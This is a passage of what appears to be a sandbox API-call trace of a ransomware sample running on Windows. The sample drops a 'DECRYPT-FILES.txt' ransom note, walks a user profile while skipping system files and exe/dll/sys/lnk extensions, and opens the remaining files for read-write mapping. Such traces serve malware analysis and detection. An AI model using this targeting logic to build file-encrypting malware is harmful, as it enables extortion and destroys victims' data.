(lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\", lpSrch="\\Local Settings\\") returned 0x0 [0185.950] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\", lpSrch="\\AppData\\Local") returned 0x0 [0185.950] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\", lpSrch="AhnLab") returned 0x0 [0185.950] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0185.950] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\") returned 38 [0185.950] lstrlenW (lpString="0a16c9.tmp") returned 10 [0185.950] wsprintfW (in: param_1=0x36fece8, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\\\0a16c9.tmp") returned 49 [0185.950] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\nethood\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x254 [0185.951] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\") returned 38 [0185.951] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0185.951] wsprintfW (in: param_1=0x36fece8, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\\\DECRYPT-FILES.txt") returned 56 [0185.951] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\nethood\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0185.951] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\") returned 38 [0185.951] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\*" [0185.951] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\*", lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7536a150, ftCreationTime.dwHighDateTime=0x1d4d278, ftLastAccessTime.dwLowDateTime=0xaf736560, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaf736560, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zUt2ThE-zNirRyoAwYp\\", cAlternateFileName="苟眔酯ͯ")) returned 0xffffffff [0185.951] CloseHandle (hObject=0x254) returned 1 [0185.954] FindNextFileW (in: hFindFile=0x479838, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb79175c0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb79175c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x100000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT", cAlternateFileName="")) returned 1 [0185.954] lstrcmpiW (lpString1="NTUSER.DAT", lpString2="DECRYPT-FILES.txt") returned 1 [0185.954] lstrcmpiW (lpString1="NTUSER.DAT", lpString2="autorun.inf") returned 1 [0185.954] lstrcmpiW (lpString1="NTUSER.DAT", lpString2="boot.ini") returned 1 [0185.954] lstrcmpiW (lpString1="NTUSER.DAT", lpString2="desktop.ini") returned 1 [0185.954] lstrcmpiW (lpString1="NTUSER.DAT", lpString2="ntuser.dat") returned 0 [0185.954] FindNextFileW (in: hFindFile=0x479838, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f60c40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f60c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xb78f1460, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x40000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ntuser.dat.LOG1", cAlternateFileName="NTUSER~1.LOG")) returned 1 [0185.954] lstrcmpiW (lpString1="ntuser.dat.LOG1", lpString2="DECRYPT-FILES.txt") returned 1 [0185.954] lstrcmpiW (lpString1="ntuser.dat.LOG1", lpString2="autorun.inf") returned 1 [0185.954] lstrcmpiW (lpString1="ntuser.dat.LOG1", lpString2="boot.ini") returned 1 [0185.954] lstrcmpiW (lpString1="ntuser.dat.LOG1", lpString2="desktop.ini") returned 1 [0185.954] lstrcmpiW (lpString1="ntuser.dat.LOG1", lpString2="ntuser.dat") returned 1 [0185.954] lstrcmpiW (lpString1="ntuser.dat.LOG1", lpString2="iconcache.db") returned 1 [0185.954] lstrcmpiW (lpString1="ntuser.dat.LOG1", lpString2="bootsect.bak") returned 1 [0185.954] lstrcmpiW (lpString1="ntuser.dat.LOG1", lpString2="ntuser.dat.log") returned 1 [0185.954] lstrcmpiW (lpString1="ntuser.dat.LOG1", lpString2="thumbs.db") returned -1 [0185.954] lstrcmpiW (lpString1="ntuser.dat.LOG1", lpString2="Bootfont.bin") returned 1 [0185.954] lstrlenW (lpString="ntuser.dat.LOG1") returned 15 [0185.954] lstrcmpiW (lpString1="LOG1", lpString2="lnk") returned 1 [0185.954] lstrcmpiW (lpString1="LOG1", lpString2="exe") returned 1 [0185.954] lstrcmpiW (lpString1="LOG1", lpString2="sys") returned -1 [0185.954] lstrcmpiW (lpString1="LOG1", lpString2="dll") returned 1 [0185.954] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned 30 [0185.954] lstrlenW (lpString="ntuser.dat.LOG1") returned 15 [0185.954] lstrcpyW (in: lpString1=0x36fef54, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\" [0185.954] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="ntuser.dat.LOG1" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG1") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG1" [0185.954] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0185.955] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat.log1"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0185.955] CloseHandle (hObject=0x0) returned 0 [0185.955] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.955] FindNextFileW (in: hFindFile=0x479838, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f60c40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f60c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28f60c40, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ntuser.dat.LOG2", cAlternateFileName="NTUSER~2.LOG")) returned 1 [0185.955] lstrcmpiW (lpString1="ntuser.dat.LOG2", lpString2="DECRYPT-FILES.txt") returned 1 [0185.955] lstrcmpiW (lpString1="ntuser.dat.LOG2", lpString2="autorun.inf") returned 1 [0185.955] lstrcmpiW (lpString1="ntuser.dat.LOG2", lpString2="boot.ini") returned 1 [0185.955] lstrcmpiW (lpString1="ntuser.dat.LOG2", lpString2="desktop.ini") returned 1 [0185.955] lstrcmpiW (lpString1="ntuser.dat.LOG2", lpString2="ntuser.dat") returned 1 [0185.955] lstrcmpiW (lpString1="ntuser.dat.LOG2", lpString2="iconcache.db") returned 1 [0185.955] lstrcmpiW (lpString1="ntuser.dat.LOG2", lpString2="bootsect.bak") returned 1 [0185.955] lstrcmpiW (lpString1="ntuser.dat.LOG2", lpString2="ntuser.dat.log") returned 1 [0185.955] lstrcmpiW (lpString1="ntuser.dat.LOG2", lpString2="thumbs.db") returned -1 [0185.955] lstrcmpiW (lpString1="ntuser.dat.LOG2", lpString2="Bootfont.bin") returned 1 [0185.955] lstrlenW (lpString="ntuser.dat.LOG2") returned 15 [0185.955] lstrcmpiW (lpString1="LOG2", lpString2="lnk") returned 1 [0185.955] lstrcmpiW (lpString1="LOG2", lpString2="exe") returned 1 [0185.955] lstrcmpiW (lpString1="LOG2", lpString2="sys") returned -1 [0185.955] lstrcmpiW (lpString1="LOG2", lpString2="dll") returned 1 [0185.955] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned 30 [0185.955] lstrlenW (lpString="ntuser.dat.LOG2") returned 15 [0185.955] lstrcpyW (in: lpString1=0x36fef54, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\" [0185.956] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="ntuser.dat.LOG2" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG2") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG2" [0185.956] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0185.956] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG2" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat.log2"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0185.956] CloseHandle (hObject=0x0) returned 0 [0185.956] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.956] FindNextFileW (in: hFindFile=0x479838, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f60c40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f60c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x40b0f7f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", cAlternateFileName="NTUSER~1.BLF")) returned 1 [0185.956] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpString2="DECRYPT-FILES.txt") returned 1 [0185.956] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpString2="autorun.inf") returned 1 [0185.956] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpString2="boot.ini") returned 1 [0185.956] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpString2="desktop.ini") returned 1 [0185.956] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpString2="ntuser.dat") returned 1 [0185.956] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpString2="iconcache.db") returned 1 [0185.956] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpString2="bootsect.bak") returned 1 [0185.956] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpString2="ntuser.dat.log") returned 1 [0185.956] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpString2="thumbs.db") returned -1 [0185.956] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpString2="Bootfont.bin") returned 1 [0185.956] lstrlenW (lpString="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 55 [0185.956] lstrcmpiW (lpString1="blf", lpString2="lnk") returned -1 [0185.957] lstrcmpiW (lpString1="blf", lpString2="exe") returned -1 [0185.957] lstrcmpiW (lpString1="blf", lpString2="sys") returned -1 [0185.957] lstrcmpiW (lpString1="blf", lpString2="dll") returned -1 [0185.957] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned 30 [0185.957] lstrlenW (lpString="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 55 [0185.957] lstrcpyW (in: lpString1=0x36fef54, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\" [0185.957] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf" [0185.957] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0185.957] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tm.blf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0185.957] CloseHandle (hObject=0x0) returned 0 [0185.957] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.957] FindNextFileW (in: hFindFile=0x479838, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f86da0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f86da0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x40b0f7f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", cAlternateFileName="NTUSER~1.REG")) returned 1 [0185.957] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpString2="DECRYPT-FILES.txt") returned 1 [0185.957] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpString2="autorun.inf") returned 1 [0185.957] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpString2="boot.ini") returned 1 [0185.957] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpString2="desktop.ini") returned 1 [0185.957] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpString2="ntuser.dat") returned 1 [0185.957] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpString2="iconcache.db") returned 1 [0185.958] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpString2="bootsect.bak") returned 1 [0185.958] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpString2="ntuser.dat.log") returned 1 [0185.958] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpString2="thumbs.db") returned -1 [0185.958] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpString2="Bootfont.bin") returned 1 [0185.958] lstrlenW (lpString="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 92 [0185.958] lstrcmpiW (lpString1="regtrans-ms", lpString2="lnk") returned 1 [0185.958] lstrcmpiW (lpString1="regtrans-ms", lpString2="exe") returned 1 [0185.958] lstrcmpiW (lpString1="regtrans-ms", lpString2="sys") returned -1 [0185.958] lstrcmpiW (lpString1="regtrans-ms", lpString2="dll") returned 1 [0185.958] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned 30 [0185.958] lstrlenW (lpString="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 92 [0185.958] lstrcpyW (in: lpString1=0x36fef54, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\" [0185.958] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms" [0185.958] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0185.958] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000001.regtrans-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0185.958] CloseHandle (hObject=0x0) returned 0 [0185.958] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.958] FindNextFileW (in: hFindFile=0x479838, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f86da0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f86da0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x40b0f7f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", cAlternateFileName="NTUSER~2.REG")) returned 1 [0185.958] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpString2="DECRYPT-FILES.txt") returned 1 [0185.959] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpString2="autorun.inf") returned 1 [0185.959] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpString2="boot.ini") returned 1 [0185.959] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpString2="desktop.ini") returned 1 [0185.959] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpString2="ntuser.dat") returned 1 [0185.959] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpString2="iconcache.db") returned 1 [0185.959] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpString2="bootsect.bak") returned 1 [0185.959] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpString2="ntuser.dat.log") returned 1 [0185.959] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpString2="thumbs.db") returned -1 [0185.959] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpString2="Bootfont.bin") returned 1 [0185.959] lstrlenW (lpString="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 92 [0185.959] lstrcmpiW (lpString1="regtrans-ms", lpString2="lnk") returned 1 [0185.959] lstrcmpiW (lpString1="regtrans-ms", lpString2="exe") returned 1 [0185.959] lstrcmpiW (lpString1="regtrans-ms", lpString2="sys") returned -1 [0185.959] lstrcmpiW (lpString1="regtrans-ms", lpString2="dll") returned 1 [0185.959] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned 30 [0185.959] lstrlenW (lpString="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 92 [0185.959] lstrcpyW (in: lpString1=0x36fef54, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\" [0185.959] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms" [0185.959] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0185.959] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000002.regtrans-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0185.959] CloseHandle (hObject=0x0) returned 0 [0185.959] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.960] FindNextFileW (in: hFindFile=0x479838, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xdc5d7160, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xdc5d7160, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xdc5d7160, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x14, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ntuser.ini", cAlternateFileName="")) returned 1 [0185.960] lstrcmpiW (lpString1="ntuser.ini", lpString2="DECRYPT-FILES.txt") returned 1 [0185.960] lstrcmpiW (lpString1="ntuser.ini", lpString2="autorun.inf") returned 1 [0185.960] lstrcmpiW (lpString1="ntuser.ini", lpString2="boot.ini") returned 1 [0185.960] lstrcmpiW (lpString1="ntuser.ini", lpString2="desktop.ini") returned 1 [0185.960] lstrcmpiW (lpString1="ntuser.ini", lpString2="ntuser.dat") returned 1 [0185.960] lstrcmpiW (lpString1="ntuser.ini", lpString2="iconcache.db") returned 1 [0185.960] lstrcmpiW (lpString1="ntuser.ini", lpString2="bootsect.bak") returned 1 [0185.960] lstrcmpiW (lpString1="ntuser.ini", lpString2="ntuser.dat.log") returned 1 [0185.960] lstrcmpiW (lpString1="ntuser.ini", lpString2="thumbs.db") returned -1 [0185.960] lstrcmpiW (lpString1="ntuser.ini", lpString2="Bootfont.bin") returned 1 [0185.960] lstrlenW (lpString="ntuser.ini") returned 10 [0185.960] lstrcmpiW (lpString1="ini", lpString2="lnk") returned -1 [0185.960] lstrcmpiW (lpString1="ini", lpString2="exe") returned 1 [0185.960] lstrcmpiW (lpString1="ini", lpString2="sys") returned -1 [0185.960] lstrcmpiW (lpString1="ini", lpString2="dll") returned 1 [0185.960] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned 30 [0185.960] lstrlenW (lpString="ntuser.ini") returned 10 [0185.960] lstrcpyW (in: lpString1=0x36fef54, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\" [0185.960] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="ntuser.ini" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini" [0185.960] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0185.960] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x254 [0185.961] GetFileSizeEx (in: hFile=0x254, lpFileSize=0x36fe720 | out: lpFileSize=0x36fe720*=20) returned 1 [0185.961] CreateFileMappingW (hFile=0x254, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, 